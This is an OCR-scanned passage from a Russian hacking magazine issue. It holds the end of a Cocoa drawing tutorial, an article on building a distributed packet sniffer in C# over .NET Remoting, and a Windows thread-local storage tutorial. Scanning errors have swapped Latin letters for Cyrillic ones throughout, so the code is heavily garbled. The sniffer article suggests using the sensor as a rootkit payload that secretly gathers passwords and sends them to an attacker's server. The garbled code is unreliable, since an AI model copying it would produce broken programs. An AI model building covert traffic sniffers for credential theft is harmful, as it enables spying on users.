Об идентификаторах ІВОиіТеІ и ІВАсбоп, которые присутствуют 
в коде нашего класса, нужно сказать отдельно. Это, собственно, 
Іпіегівсе Виіібег ОиНеІ; (ссылка на элемент интерфейса) и Іпіегівсе 
Виіібег Асбоп — обработчик события, которое генерируется каким- 
то объектом ОІЛ. Привязывать их к реальным объектам пользо- 
вательского интерфейса в коде не нужно, сделаем это, используя 
великий и могучий Іпіегібсе ВиіШег. Для этого: 

а. открываем контекстное меню для объекта АррСопІгоІІег в 
ІпІегІбсеВиіІсІег’е; 

б. дропаем созданные нами аутлеты на соответствующие контролы, 
а ІВАсбоп — на кнопку. 

Ну вот, наконец-то наше мегаприложение готово к работе. Жмем на 



«Виіісі апб Ѳо» и видим следующее (см. картинку). 

Кстати, важный момент: методы и функции Сосоа не бросают 
исключения, поэтому не жди, что это приложение упадет, если ты 
вместо целого числа введешь строчку букв. Обработка некоррект- 
ных значений в этом случае — задача программиста (но об этом в 
другой раз). 

Кварцевая графика 

Итак, стандартные компоненты на форму мы с тобой кидать научи- 
лись, и даже научились обрабатывать события от них и изменять 
их состояние из кода. Ну, а что если нужного контрола в стандарт- 
ных библиотеках нет? Если хочется нарисовать на форме что-то 
необычное? В самом деле, это же графическое приложение :). 
Конечно же в Мае 05 X сделать это возможно, причем, с помощью 
самого Сосоа. 

Для отрисовки графики в Мае 05 X используется векторный дви- 
жок 0иаг2. Для того, чтобы отрендерить собственную 20-сцену, нам 
потребуется создать свой класс-вид, наследник Ы5Ѵіе\л/. Нам нужно 
будет переопределить метод бгаѵѵРесІ: в этом классе. 

ХСобе создаст для нас два файла — МуѴіеѵѵ.Ь и МуѴіеѵѵ.т с шабло- 
ном интерфейса и реализацией нашего класса соответственно. 
Дропаем МуѴіеѵѵ.Ь из списка файлов проекта на главное окно 
Іпіегівсе ВиіШег. Теперь выбираем из палитры контролов ЫЬгагу 
СизІотѴіеѵѵ, перетаскиваем его на нашу форму и в окошке инспек- 
тора задаем для этого контрола МуѴіеѵѵ в качестве базового класса. 
Устанавливаем высоту вида равной ширине (это нам пригодится 
для профилактики искажений в данном конкретном примере). 
Теперь нужно позаботиться о внешнем виде нашего контрола. 
Нарисуем что-нибудь красивое — например, монаду Инь-Янь. Все 
линии (раіЫ будем создавать с помощью кривых Безье. В этом нам 
поможет Сосоа-класс Ы5Ве2ІегРа1;Ь (см. врезку). 

Заключение 

Теперь ты знаешь, как создать ѲІІГшное Сосоа-приложение. 
Процесс разработки под Ю5 для всяческих іРЬопе’ов и іРасГов не 
сильно отличается от создания оконных приложений для макоси, 
который описан здесь, поэтому дерзай. Удачи! з: 
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Создаем свой класс-вид 


Реализация класса МуѴіеѵѵ 





// Импортируем заголовок 

// Его за нас создала ХСосІе 

/ / Ничего там менять не будем в этот раз . 

# ігпрог б " МуѴіетл . Ъ . " 

Оітріетепбабіоп МуѴіехѵ 

// Этот код тоже создала ХСобе 

// И здесь мы тоже ничего менять не будем : ) 

- ( іб) іпіШібНРгате : (ЫЗКесб ) бгате { 

зеіб = [зирег іпібЫбкРгате : бгате] ; 
іб ( зеіб ) { 

// Іпібіаіігабіоп собе Неге. 

} 

гебигп зеіб; 

} 

// А вот в методе отрисовки 
/ / мы и напишем код нашей 
// 2 Б- сцены 

- (ѵоіб) бгаѵЫесб : (ИЗКесб) гесб 

{ 

/ / Установим серый цвет для кисти 
[ [ЫЗСоІог дгауСоІог] зеб] ; 

// Заполним всю доступную нам область 
ЫЗКесбЕШ ( гесб ) ; 

// Впишем в нашу прямоугольную область окружность 
ИЗВегіегРабЪ. * сігсіе = 

[ЫЗВезіегРабН ЬегіегРабШібНОѵаІІпВесб : гесб] ; 

// Задаем толщину линии 
[сігсіе зебЬіпеЫсІбІі : 2.0]; 

// Заливать будем белым 
[ [ЫЗСоІог ѵйіібеСоІог] зеб] ; 

[сігсіе бііі] ; 

// А теперь черный для границы 
[ [ЫЗСоІог ЫаскСоІог] зеб] ; 

/ / Отрисуем границу 
[сігсіе збгоке] ; 

// Эти значения нам очень пригодятся; чтобы не 
// считать их каждый раз, сделаем это здесь 
біоаб сепбег_х = гесб . зізе ллмббк / 2.0; 
біоаб сепбег_у = гесб . зізе .НеідНб / 2.0; 

ЫЗРоіпб сепбег = {сепбег_х, сепбег_у) ; 

ЫЗРоіпб сепбег_ир = {сепбег_х, сепбег_у * 0.5); 
ЫЗРоіпб сепбег_бп = {сепбег_х, сепбег_у * 1.5); 

біоаб габіиз = 



сепбег_х < сепбег_у ? сепбег_х : сепбег_у; 
// Темная часть монады 
ЫЗВезіегРабН * Ыаск_зібе = 

[ЫЗВезіегРабН ЬезіегРабН] ; 

/ / Большая дуга 

[Ыаск_зібе аррепбВеЫегРабШббЬАгсЫбкСепбег : 
сепбег 

габіиз : габіиз 
збагбАпдІе: 90 
епбАпдІе: 270 
ЫоскЫзе: УЕЗ] ; 

// Верхняя малая дуга 

[Ыаск_зібе аррепбВезіегРабШібНАгсШібНСепбег : 
сепбег_ир 

габіиз : габіиз / 2 
збагбАпдІе: 270 
епбАпдІе: 90 
сіоскѵ^ізе: N0] ; 

// Нижняя малая дуга 

[Ыаск_зібе аррепбВезіегРабШібЬАгс^ібНСепбег : 
сепбег_бп 

габіиз : габіиз / 2 
збагбАпдІе: 270 
епбАпдІе: 90 
сіоскѵ^ізе: УЕЗ] ; 

// Заливаем черным 
[ [ЫЗСоІог ЫаскСоІог] зеб] ; 

[Ыаск_зібе бііі] ; 

/ / Малый черный круг 

[ [ЫЗВегіегРабк ЬезіегРабШібкОѵаІІпКесб : 
ИЗМакеКесб ( сепбег_х - габіиз / 6.0, 
сепбег_у - габіиз * (0.5 + 1/6.0), 

габіиз / 3.0, габіиз/3 . О ) ] 6111]; 

// Малый белый круг 
[ [ЫЗСоІог ѵ^ЬібеСоІог] зеб] ; 

[ [ЫЗВегіегРабк ЬегіегРабШібНОѵаІІпКесб : 
ИЗМакеКесб (сепбег_х - габіиз / 6.0, 
сепбег_у + габіиз * (0.5 - 1/6.0), 

габіиз / 3.0, габіиз/3.0)] бііі] ; 

} 

@епб 
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© Привычный инструмент (например, снифер), который позволяет 
нам решать какую-либо задачу (анализ трафика), при взгляде на 
него с другой позиции дает разработчику шанс получить на выходе 
нечто принципиально новое. Рассмотрим формулу «снифер + 
распределение» и докажем, что ее результат - не просто 
«распределенный снифер». 



Ниша сетевых анализаторов плотно занята продуктами с самым 
разнообразным функционалом, и вряд ли очередной самодель- 
ный снифер будет выделяться своей оригинальностью. Среди 
бесплатных аналогов, пожалуй, флагманом является мультиплат- 
форменный ѴѴігезбагк: продвинутые фильтры по протоколам, гиб- 
кие средства автоматизации анализа протоколов и восстановления 
ТСР-потоков, средства фильтрации и поиска пакетов по множеству 
параметров, формирование статистических данных и прочие 
функции делают этот сетевой анализатор на голову выше своих 
бесплатных конкурентов. Среди платных ему не уступает, а в ряде 
случаев и превосходит его, продукт СоплтѴіеѵѵ. 

Выбор конкретного инструмента зависит, прежде всего, от задачи, 
которая с его помощью решается. ѴѴігезбагк для обеспечения своей 
работоспособности использует библиотеку РСАР (Раскеі Саріиге], 
что в ряде случаев может не дать нужного результата. Например, 
при изучении сетевой активности вредоносного программного обес- 
печения, установленного в систему на уровне драйвера. В данном 



случае на помощь исследователю может прийти СотппѴіеѵѵ, который 
устанавливает в систему собственный ЫОІЗ-драйвер, что позволяет 
ему работать с пакетами на самом низком уровне. 

Да, новому игроку на этом поле будет непросто выдержать 
конкуренцию с такими популярными, функциональными и рас- 
пространенными продуктами. Вряд ли разработчику удастся 
привнести кардинальные изменения в индустрию сетевых 
анализаторов, если его идеи будут ограничены рамками идей 
других коллег. Чтобы твой продукт заметили, необходимо как 
минимум привнести что-либо инновационное, то, что до тебя 
либо еще не придумали, либо не реализовали. 

Конвертация мысли в инновацию 

Нестандартные идеи и подходы рождаются с нестандартными 
взглядами на привычные вещи. Вдоволь наигравшись со снифе- 
ром, вдоль и поперек изучив сетевую активность операционной 
системы, перехватив всевозможные собственные или чужие паро- 



► 112 



ХАКЕР 01 [144) 201 1 





Режим пошагового исполнения программы 
позволяет определить инструкцию вывода 
полученных данных 

ли, наталкиваешься на мысль, что было бы неплохо 
иметь возможность использовать этот инструмент 
на хосте, находящемся в другом сегменте сети или в 
локальной сети, находящейся за тысячи километров, 
отделенной от внешнего мира маршрутизатором и 
доступной только через интернет. 

С позиции системного администратора такая возмож- 
ность удаленного сетевого анализа трафика своих 
серверов полностью абстрагировала бы его от их 
местоположения. Единожды расставив некий модуль 
на ключевые компьютеры в тех сегментах сети, которые 
требуют пристального наблюдения, он будет получать 
актуальную информацию и сможет в реальном времени 
проанализировать трафик, который циркулирует в этих 
сегментах. 

С точки зрения аудитора безопасности возможность 
удаленного мониторинга трафика позволяет значитель- 
но упростить процесс аудита, так как модули снифера в 
параллельном режиме независимо друг от друга соби- 
рают все необходимые пакеты и формируют отчет на 
специальном сервере, что впоследствии позволит ему 
ознакомиться с общей картиной исследуемой инфра- 
структуры, сетевых процессов и отследить перемеще- 
ние критичной информации. 

В свою очередь, хакер получает оригинальный 
инструмент, представляющий собой подобие троян- 
ского программного обеспечения, за тем исключе- 
нием, что указанный модуль может быть полезной 
нагрузкой какого-нибудь руткита и пассивно собирать 
информацию о паролях к сервисам, которые исполь- 
зует пользователь, и прочим конфиденциальным дан- 
ным. Затем формировать отчет и при первой удач- 
ной возможности отправлять его на сервис хакера, 
который отображает информацию в удобочитаемом 
виде. А может быть, злоумышленник получил доступ 
к одному из хостов исследуемой подсети и желает 
иметь представление о том, куда попал, что тут про- 
исходит и какие сетевые пакеты в сегменте сети 
могут представлять ценность. 

Позиция разработчика этого программного обеспече- 
ния содержит, помимо оригинальной идеи, еще ряд 
неочевидных «полезностей», которые мы будем выяв- 
лять по мере исследования концепции распределенно- 
го снифера. 

Распределение + снифер = ? 

На выходе этой простой формулы может получиться 
трудно предсказуемый результат. 

Во-первых, все зависит от того, какой сетевой анализа- 
тор трафика будет распределяться: 

• имеет ли он дружественный интерфейс пользователя; 




Различие между ведущими сетевыми анализаторами спрятано 
в их архитектуре 



• на каком уровне работает с пакетами (использует 
библиотеку РСАР или собственный драйвер); 

• поддерживает ли плагины (модульная архитектура); 

• моно- или мультиплатформенный; 

• количество поддерживаемых декодировщиков про- 
токолов; 

• прочие возможности, от наличия которых зависит 
интерес пользователей к сниферу. 

Задача состоит не в написании конкурентоспособного 
сетевого анализатора трафика (в журнале неоднократ- 
но публиковались материалы о написании снифера 
с использованием разных инструментов и подходов, 
поэтому советую поднять подшивку или ознакомиться 
с содержимым ссылок, приложенных к статье). По этой 
причине предлагаю абстрагироваться от программной 
составляющей снифера и сконцентрироваться на про- 
цессе его распределения, тем самым поддерживая 
основную идею и увеличивая значимость полученного 
концепта. 

Во-вторых, что понимать под распределением, ведь 
здесь формально отсутствует какая-либо трудоемкая 
задача, и нет никакой параллельной вычислительной 
системы. Если смотреть реальности в глаза, то сам по 
себе сетевой анализатор, компоненты-сенсоры которо- 
го исследуют разные и даже независимые друг от друга 
части сети, является распределенной системой. 

И, наконец, в-третьих, формирование отчета на сто- 
роне серверной части и его предоставление в удобо- 
читаемом виде реципиенту в нашем лице также может 
осуществляться произвольным образом, на усмотрение 
программиста. 

Совокупность вышеперечисленных факторов позволяет 
разработчику системы подойти к ее проектированию 
с разных позиций и в разной степени акцентировать 
внимание на разработке той или иной части. 

Анализируй это 

К распределению сетевого анализатора будем под- 
ходить с точки зрения спектра технологий ѴѴіпсіоѵѵб 
Соттипісабоп Еоипбаііоп, которые любезно предо- 
ставляет .ЫЕТ Егатеѵѵогк (детальный обзор ѴѴСЕ ты 
можешь найти в позапрошлом выпуске журнала в ста- 
тье «ѴѴТЕ ѴѴСЕ?! ѴѴіпсІоѵѵз Соттипісабоп Еоипбабоп: 
искусство скоростного создания сложных транзакци- 
онных систем»). По этой причине после непродол- 
жительных поисков в Сети у меня на руках оказались 
исходные коды простого снифера, написанного на С#. 
Чтобы понять, с какой стороны подойти к наращиванию 
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Т 

> Ііпкз 



• ЬНрУ/сІеіес.ги/ѵѵіі ѵѵсб 
— статья «ѴѴіпсІоѵѵз 
Соттипісабоп 
Еоипбабоп: искусство 
скоростного создания 
сложных транзакцион- 
ных систем». 

• ѵѵѵѵѵѵ.хакер.ги/ 
розІ:/1 6494/ — доволь- 
но старая инструкция 
по написанию снифера 
с использованием 



РСАР. 



• уууууу.соберпфесЦ 
сот/КВ/ІР/ 
СЗІЧеІлл/огкЗпі^ег.азрх 

— небольшая статья 
(англ.) о создании про- 
стого снифера на С#. 

• ѵѵѵѵѵѵ.хакер. 
ги/тадагіпе/ 

ха/ 1 35/096/ 1 .азр — 
статья, посвященная 
созданию распреде- 
ленного приложения 
на основетехнологии 
,І\ІЕТ Ветобпд. 




> СІѴСІ 



На диске находятся 
исходные коды подо- 
пытного снифера 
и сэмпл простейшего 
приложения на осно- 
ве ,І\ІЕТ Ветобпд. 
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ІР-адрес, 

которому привязывается сокет 



Процесс перехвата сетевых пакетов 






тами непосредственно на уровне их «конструирования». Сокет 
привязывается к I Р-адресу, затем вызывается метод ІОСопігоІ со 
специальным кодом управления «РесеіѵеАІІ», который указывает 
сокету на то, что все входящие и исходящие пакеты должны быть 
перехвачены. 

Организация процесса перехвата сетевых пакетов 

// создание гаѵ^-сокета 
шаіпЗоскек = петл Зоскек ( 

АсІсІгеззРатіІу . ІпкегЫекчлгогк , 

ЗоскекТуре . Качлц РгокосоІТуре . ІР) ; 

// привязка созданного сокета к выбранному ІР-адресу 
шаіпЗоскек . Віпсі (пеѵ/ІРЕпсІРоіпк ( 

ІРАсІсІгезз . Рагзе (стЫпкегкасез . Техк) , 0) ) ; 

/* включение ІР-заголовка в данные 
и перевод сокета в режим приема всех пакетов */ 
шаіпЗоскек . ЗекЗоскекОркіоп ( 

ЗоскекОркіопЬеѵеІ . ІР , 

ЗоскекОркіогШате . Неабегіпсіибеб, 
кгие) ; 

шаіпЗоскек . ІОСопкгоІ ( 

ІОСопкгоІСосіе . РесеіѵеАІІ , 

ЬуТгие , / / входные данные , необходимые для операции 
ЬуОик);// выходные данные, возвращенные операцией 
// непосредственно асинхронный перехват пакетов 
шаіпЗоскек . ВедіпРесеіѵе (ЬукеБака , 0 , 



нужного нам функционала, необходимо в общих чертах ознако- 
миться с устройством «подопытного» приложения. Имеющийся в 
наличии снифер разбирает пакеты наиболее распространенных 

ПРОТОКОЛОВ: 

• ТСР; 

• ІЮР; 

• ІР; 

• БЫВ. 

Напомню, что протоколы типа НТТР, 5МТР, РТР и прочие инкап- 
сулируются в ТСР, который, в свою очередь, инкапсулируется 
в ІР: поэтому, если у тебя вдруг появится желание «допилить» 
имеющийся снифер, рекомендую начать с парсинга популярных 
высокоуровневых сетевых протоколов. 

Процесс перехвата пакетов осуществляется с помощью так назы- 
ваемого сырого сокета (гаѵѵ воске!), то есть манипулирует паке- 



ЬукеБака . Ьепдкк , ЗоскекЕІадз . Ыопе , 
печлАзупсСаІІЪаск (ОпРесеіѵе) , пиіі) ; 

Процедуры парсинга заголовков протоколов описаны в соответ- 
ствующих классах: ІРНеабег, ОІЧЗНеасІег, ТСРНеабег. В качестве 
примера рассмотрим структуру класса ІРНеабег. 

Структура класса ІРНеасІег 

риЫіс сіазз ІРНеабег 

{ 

/* список членов, каждый из которых отвечает за 
конкретное поле заголовка ІР-пакета */ 

/* конструктор класса, в качестве параметров 
использует массив принятых байтов */ 
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АсЫТгееЫобе аббТгееЫобе 




Структура распределенного сетевого анализатора 
трафика 

риЫіс ІРНеасіег (Ьу бе [ ] ЬуВиббег , іпс пКесеіѵесі) 

{ 

} 

} 

Аналогичным образом происходит разбор заголовков ТСР и 
ІШ Р: их содержимое читается с той позиции, в которой заканчи- 
вается содержимое ІР-заголовка. Разобравшись со структурой 
одного из предоставленных классов, можно написать парсер 
какого-либо специфичного протокола, имея на руках устрой- 
ство его заголовка (как правило, описывается в спецификации 
протокола — документ РРС). Добавляя новые декодировщики 
протоколов, можно составить конкуренцию большинству имею- 
щихся решений. Наращиванием функционала программы в виде 
плагинов (соответственно, после проектирования интерфейса 
их подключения) обеспечивается ее расширяемость и гибкость, 
а там уже и пользовательский интерфейс в виде плагина не за 
горами... 

Распределяй и властвуй 

И вот, допустим, у нас на операционном столе пациент, пред- 
ставляющий собой полнофункциональный сетевой анализатор 
трафика, который ждет хардкорного имплантирования свежей 
идеи в виде распределения. Определяем область имплан- 
тирования. Для этого найдем место, где собранные данные 
фиксируются и отправляются на вывод в пользовательский 
интерфейс: 

/*вспомогательная функция, которая возвращает 
информацию, содержащуюся в заголовке ІР-пакета*/ 
ргіѵабе ТгееЫосІе МакеІРТгееЫосІе ( ІРНеасіег ірНеасІег) 

{ 

//инициализация узла — записи в общем дереве 
ТгееІМосІе ірЫосІе = пей ТгееЫобе ( ) ; 

//формирование записи 

ірЫобе I 

} 

Далее в пошаговом режиме исполнения приложения опреде- 
ляем положение инструкции вывода сформированных данных в 
область пользовательского интерфейса: 



п ем АббТгееЫобе (ОпАббТгееЫосІе) ; 

Именно в это место производим вставку «имплантанта» в виде 
распределяющего кода. Для этого нам потребуется вспомнить 
архитектуру клиент-серверного приложения на основе техноло- 
гии ,І\ІЕТ Петобпд. Сэмпл простейшей «распределенки» ищи на 
диске — именно его мы сейчас соответствующим образом адапти- 
руем к нашему сниферу. 

Так как наше исходное приложение представляет собой не что 
иное, как упоминавшийся модуль-сенсор, который предназначен 
для сбора пакетов и их отправки серверу в реальном времени, 
то найденную процедуру вывода собранных в пользовательский 
интерфейс данных заменим кодом отправки их на сервер: 

/* создание и регистрация клиентского канала 
с помощью конфигурационного файла */ 
КетобіпдСопбідигабіоп . Сопбідиге ( " Сііепб . ехе . бхб " ) ; 

// создание объекта удаленного класса 
Тезб безб = щеп/ Тезб ( ) ; 

// обновление общего пула логов 
безб . ЗепбЬод (гообЫобе) ; 

В свою очередь, метод удаленного класса ВепсИодО должен 
добавлять к содержимому общего отчета, находящегося на сто- 
роне сервера, данные типа гооІІЧосІе. Для наглядности примера 
предположим, что общий отчет хранится в строковой перемен- 
ной Рези и, тогда обновление отчета происходит следующим 
образом: 

риЫіс ѵоіб ЗепбЬод ( збгіпд ЗепзогЬод) 

{ 

// добавления лога сенсора в общий отчет 
Кезиіб = Кезиіб + ЗепзогЬод; 

} 

Используя этот же класс на своей стороне, сервер в реальном 
времени может просматривать общий отчет, хранящийся в пере- 
менной Рези 11; и форматируя ее вывод произвольным образом. 

//вывод отчета на стороне сервера 
ЬезЬ . 8Ь.СШ ( ) 

Здесь ЗЬоѵѵО — метод удаленного класса, который осуществляет 
вывод переменной РезиН; в удобочитаемой форме. 

Метод ЗЬоѵѵО представляет собой некую абстракцию: он может 
быть банальным выводом результата в консоль сервера с помо- 
щью пары инструкций, может являться выводом в специфичное 
хранилище логов (например, база данных) из которого впо- 
следствии формируется предоставляемый пользователям отчет, 
данные в котором отсортированы строго по определенным кри- 
териям. 

Есть идея? Значит, делай! 

До реализации полноценного инновационного (Денис, сколько 
можно употреблять это слово! По-моему, тебя перекупила пар- 
тия власти :) — прим.ред.) продукта предстоит осуществить еще 
несколько шагов: написать полнофункциональный и конкурент- 
носпособный сетевой анализатор трафика, распределить его в 
соответствии с тем подходом, который описан в статье, реализо- 
вать в виде онлайн-сервиса удобную серверную часть, которая в 
реальном времени обрабатывает непрерывный поток отчетов с 
сенсоров и представляет статистику пакетов в надлежащем виде. 
Тем не менее, имея за спиной не только нестандартную мысль, 
но и оригинальную, яркую идею ее практической реализации, ты 
можешь смело рассчитывать на блестящий результат.Как гласит 
слоган одной крупной компании, просто возьми и сделай! т 
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Программерские 

типсыитрйксьі 



Локальное 
хранилище 
потока 
или что такое 
Л 5 






О Программисты, которые впервые сталкиваются с многопоточным программированием, очень 
часто совершают ошибки, связанные с нарушением общего доступа. Разные потоки могут 
обратиться к одной и той же переменной и одновременно попытаться изменить значение. 

Таких проблем можно избежать, используя старые добрые локальные переменные или... 
локальное хранилище потока. 



Представим многопоточное приложение, которое в своем коде 
использует глобальные или статические переменные. Трудно 
представить? А вот и нет. Наглядным примером такой ситуации 
может служить функция зігіок стандартной библиотеки С++. 
Точнее, в качестве такого примера она могла выступить рань- 
ше, сейчас ее уже переписали и сделали «правильной». Но не 
это сейчас важно. Главное то, что при первом вызове функция 
зігіок запоминала указатель на строку, передаваемый ей в 
свою собственную статическую переменную. Вполне вероятна 
была ситуация, что эту функцию практически одновременно 
могли вызвать сразу два потока, вследствие чего указатель на 
строку успешно менялся, и один из потоков получал доступ к 
неправильным данным. 

Такие ошибки очень трудно отследить. Использование локаль- 
ных переменных и параметров функций в значительной 
степени решают эту проблему, но иногда просто невозмож- 
но обойтись без статических или глобальных значений. Для 
наглядности можно взглянуть на код ниже и понять, как же все 
это работает. 

Глобальные переменные в многопоточном приложении 

/ / глобальные переменные 

іпб 11з_і; 

сііаг б1з_сЬаг [25 ] ; 

// Потоковая функция 

ШОКБ ѴЕШАРІ ТПгеабРшіс ( ЬРѴОІБ ІрРагаш ) 

{ 

// использовать глобальные переменные в потоках — 
плохая идея 

б1з_і = (іпб)ІрРагаш; 

Ізбгсру (б1з_сЪ.аг , " аггау об сЬаг"); 

сНаг ззМзд [80] ; 

мзргіпбб ( ззМзд, "Рагашебег = %б. " , б1з_і ); 

МеззадеВох( ШЬЬ, ззМзд, "ТЬгеасІРипс " , МВ_ОК ); 

гебигп 0; 

} 

іпб АРІЕЫТВУ МпМаіп( 



НІЫЗТАЦСЕ Піпзбапсе, 

НІЫЗТАЦСЕ ПРгеѵІпзбапсе, 

ЬРЗТК. ІрСшбХііпе, 
іпб пСтсІЗІютлЦ 

{ 

БШКБ бѵѵТЬгеабІб; 

СгеабеТПгеаб (ШЬЕ, 0, ТЬгеабРипс, 

(ЬРѴОІБ) 1 , 0 , &б-ыТПгеабІб) ; 

СгеабеТПгеаб (ШШ , 0, ТПгеабЕипс, 

(ЬРѴОІБ) 2 , 0 , &б-ыТПгеабІб) ; 

Зіеер ( 10000 ) ; 

// Наслаждаемся результатом 10 секунд 
гебигп 0 ; 

} 

Мы создаем два потока, в которых работает один и тот же код. Этот 
код обращается к глобальным переменным с операциями чтения/ 
записи. Такой подход совершенно небезопасен и может быть реа- 
лизован только абсолютным новичком в программировании или 
полным дилетантом. Если от многопоточности никуда не деться, а 
глобальные переменные очень нужны, и их нельзя ничем заменить, 
то в этом случае нам на помощь придет локальная память потока, 
іГігеасІ-ІосаІ зіогаде (ТІ_5). 

Что такое ІНгеасІ-ІосаІ зіогаде? 

ТІ_5 позволяет каждому потоку многопоточного процесса выделять 
адреса для хранения данных определенного потока. То есть, проще 
говоря, с каждым потоком в процессе можно ассоциировать неко- 
торую область в памяти, в которой будут храниться определенные 
данные. У каждого треда эта область памяти своя, и получить к ней 
доступ из другого потока нельзя. Таким образом, решается пробле- 
ма совместного доступа к данным. 

Обычно локальная память потока более полезна при разработке 
060, так как в этом случае нам неизвестна структура программы, с 
которой они будут связаны. В обычных приложениях эта технология 
тоже вполне работоспособна. 

ТІ_5 бывает двух типов: статическая и динамическая. В общем и 
целом оба типа локальной памяти потока преследуют одну и ту же 
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ПРОЦЕСС 



Битовые флаги П$ от до (ТІ$_МІМІМиМ_АѴАИАВІЕ - 1) 
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Поток 2 



Индекс О 
Индекс 1 
Индекс 2 
Индекс 3 
Индекс 4 



Индекс 

П5_МІМІМиМ_АѴАІІАВІ.Е - 2 
Индекс 

Т15_МІМІМиМ_АѴАІІАВІ.Е - 1) 



Внутренние структуры данных, предназначенные для управления локальной памятью потока 



цель — безопасное хранение данных. Однако реализация и метод 
их использования сильно отличаются друг от друга. 

Й іинамическая локальная 
амять потока 

Динамический ІІпгеасІ-ІосаІ зіогаде реализован в ѴѴіпсІоѵѵз с 
помощью системных АРІ. Их всего четыре: ТІзАІІос, ТІзѲеіѴаІие, 
ТІзЗеіѴаІие и ТІзРгее. Но прежде, чем познакомиться с ними 
поближе, нужно изучить, как устроена динамическая ИЗ изнутри. 
Для этого советую взглянуть на рисунок. 

Каждый флаг выполняемого в системе процесса может находиться 
в состоянии РРЕЕ или ІІЧЕІЗЕ, указывая, свободна или занята дан- 
ная область локальной памяти потока. Значение И5_М I N I М I) М_ 
АУАЮАЕЮЕ изменяется в зависимости от версии ОС. Например, 
в ѴѴіпсІоѵѵз 98/Ме это число было равно 80, а в ѴѴіпсІоѵѵз 2000/ХР 
— уже 1088. С каждым потоком сопоставлен массив длиной ТЕ5_ 

М I N I М ЦІ М_АѴА I ЕАВ Е Е с элементами типа РѴОЮ. 

Функция ТІзАІІос служит для резервирования блока в массиве, 
принадлежащему вызвавшему ее потоку. Грубо говоря, она ищет 
ячейку с флагом ГРЕЕ и возвращает ее индекс. Прототип ТІзАІІос 
выглядит так: ШОШЭ ТлГШАРІ ТІзАІІос (ѵоіО) . Если функция 
завершилась неудачей, то возвращается ТЕ8_0 11Т_0 Р_І N О ЕХЕ5. 
ТІзЗеіѴаІие, как видно из названия, служит для занесения в 
зарезервированную ячейку локальной памяти потока некоторого 
значения. Первым передаваемым функции параметром служит 
результат вызова ТІзАІІос, а вторым является непосредственно 
значение переменной, которую нужно сохранить в ТЕЗ. Обращаясь 
к ТІзЗеіѴаІие, поток изменяет только свой РѴОЮ-массив. Он не 
может что-то изменить в локальной памяти другого потока. 



іп ЬРѴОІБ ІрТІзѴаІие 

) ; 

В отличие от предыдущей, эта функция ТІзѲеіѴаІие возвращает 
значение, содержащееся в ячейке массива с заданным индек- 
сом. Ее описание выглядит так: РѴОІБ ТІзСеЕѴаІие (ШОШЭ 
ОѵѵТІзіпОех) . Как и ТІзЗеіѴаІие, ТІзОеіѴаІие в параметре 
сіѵѵТізі псіех принимает значение, полученное от ТІзАІІос. 

Ну и, наконец, функция ТІзРгее. Единственным ее параметром, о 
чем несложно догадаться, является индекс, полученный в резуль- 
тате вызова ТІзАІІос. АРІ освобождает зарезервированный блок, 
занятый ранее. 




Теперь давай попробуем воспользоваться полученными знаниями 
и изменим программу, код которой был приведен в начале статьи. 
Для этого в функции ѴѴіпМаіп мы два раза вызовем ТІзАІІос, тем 
самым зарезервировав в локальной памяти потока две ячейки под 
переменные типа РѴОЮ. Затем мы создаем два треда, каждый из 
которых будет обращаться к своей ячейке в ТЕЗ массиве, и, сле- 
довательно, выводить свое сообщение на экран. По завершению 
программы мы освободим занятую нами память с помощью вызова 
ТІзРгее. 

Использование динамической ТІ_5 в многопоточном 
приложении 

// ТЪЗ индексы 
ШОКБ Ііз_і ; 

ШОБШ Ц1з_сЕаг; 



Прототип функции ТІзБеІѴаІие 

ВООЬ ШМАРІ ТІзЗеВѴаІие ( // Потоковая функция 

іп ШОШЭ ймТІеІпсІех, ШОШЭ ѴШГАРІ ТПгеасіРипс ( ЬРѴОІБ ІрРагаш ) 
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ССЮІЫб 



{ 

ТІзЗеВѴаІие (Ыз_і , ІрРагаш) ; 

сАаг *сАаг_Ъи:Е = пем сАаг[25]; 

ІзЪгсру (сАаг_ЪиГ , " аггау о Г сАаг"); 

ТІзЗеВѴаІие (В1з_сАаг , сАаг_Ъи:Е) ; 

сАаг згМзд[80]; 

і = ТІзСеВѴа1ие(Ыз_і); 

Ѵ7зргіпр^ ( згМзд, "РагатеВег = %с1. " , і |.| 

МеззадеВох( ШЬЬ, згМзд, "ТАгеасІРипс " , МВ_ОК ); 

с1е1еЕе[] сЬаг_ЬиР; 

геЕигп 0 ; 

} 

іпЕ АРІЕБТКУ ШіпМаіп ( 

НШЗТАЖЕ АІпзЕапсе, 

НШЗТАЫСЕ АРгеѵІпзЕапсе, 

ЬРЗТК ІрСшсІЕіпе, 
іпЕ пСтдЗАом) 

{ 

БѴГОКБ сІмТАгеасІІсІ; 

Еіз_і = ТІзАІІос ( ) ; 

ЕІз_сАаг = ТІзАІІос ( ) ; 

СгеаЕеТАгеасі (ШШ, 0, ТАгеасІРипс , 

(ЬРѴОІБ)І, 0, &сі™ТАгеасіІсі) ; 

СгеаЕеТАгеасі (ШЬЬ , 0, ТАгеасІРипс, 

( ЬРѴОІБ) 2 , 0, &й™ТАгеасіІсі) ; 

Зіеер ( 10000 ) ; 

// Наслаждаемся результатом 10 секунд 

ТІзЕгее (Еіз_і) ; 

ТІзРгее (Е1з_сАаг ) ; 

геЕигп 0; 

} 

Как видим, каждый из потоков обращается к элементу с одним и 
тем же индексом, но благодаря тому, что у каждого треда имеется 
свой массив локальной памяти, не происходит ничего неприятного. 
Оба потока спокойно уживаются друг с другом и не портят свои 
ТІ_5-переменные. 

Статическая ІНгеасІ-ІосаІ з+огаде 

Главное отличие между статической и динамической ТІ_5 состоит в 
простоте использования первой — достаточно лишь использовать 
специальную директиву компилятора. Основную работу с ИзгеасГІосаІ 
зіогаде берет на себя операционная система. Линкер генерирует 
специальные структуры в РЕ-файле, а также секцию с именем Из 
(как правило), в которых хранятся все нужные данные для того, чтобы 
загрузчик модуля правильно инициализировал локальную память 
потоков. Производительность при использовании статической ТІ_8, 
конечно, страдает, но зато выигрывает программист. Не надо больше 
выделять блоки памяти и затем их освобождать, не надо вызывать 
специальные АРІ для чтения и записи в іАгеаб-ІосаІ зіогаде, все 
делается нативными средствами языка С++. Давай еще раз подпра- 
вим нашу тестовую программу и попробуем воспользоваться меха- 
низмом статической локальной памяти потока. 



Использование статической ТІ_5 в многопоточном 
приложении 

// ТЪЗ -переменные 

сіесі зрес (ЕАгеасІ) іпЕ Еіз_і; 

сесі зрес ( ' лгеаб ) сАаг ЕІз_сАаг [25 ] ; 

// Потоковая функция 
ШОКБ ШНАРІ ТАгеасІРипс ( 

ЬРѴОІБ ІрРагаш ) 

{ 

11з_і = ( іпЕ ) ІрРагаш; 

